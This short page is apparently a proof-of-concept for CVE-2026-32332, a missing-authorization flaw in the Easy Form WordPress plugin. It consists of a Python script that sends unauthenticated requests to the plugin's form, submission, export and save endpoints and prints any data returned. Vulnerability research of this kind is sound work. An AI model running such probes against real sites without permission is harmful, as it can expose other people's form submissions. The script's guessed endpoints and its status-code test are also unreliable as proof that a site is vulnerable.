CVE-2026-32332 WordPress Easy Form插件访问控制漏洞

import requests # CVE-2026-32332 PoC - Missing Authorization in Easy Form WordPress Plugin # Target: WordPress site with Easy Form plugin <= 2.7.9 TARGET_URL = "https://example.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2026-32332 Missing Authorization vulnerability in Easy Form plugin """ # Common Easy Form API endpoints that should require authentication endpoints = [ "/wp-json/ays-form/v1/forms", "/wp-json/ays-form/v1/submissions", "/wp-admin/admin-ajax.php?action=ays_form_export", "/wp-admin/admin-ajax.php?action=ays_form_save" ] for endpoint in endpoints: url = TARGET_URL + endpoint try: response = requests.get(url, timeout=10) # If we get a successful response without authentication if response.status_code == 200: print(f"[+] Potential vulnerability at: {url}") print(f"[+] Response: {response.text[:200]}") except requests.RequestException as e: print(f"[-] Error accessing {url}: {e}") if __name__ == "__main__": check_vulnerability()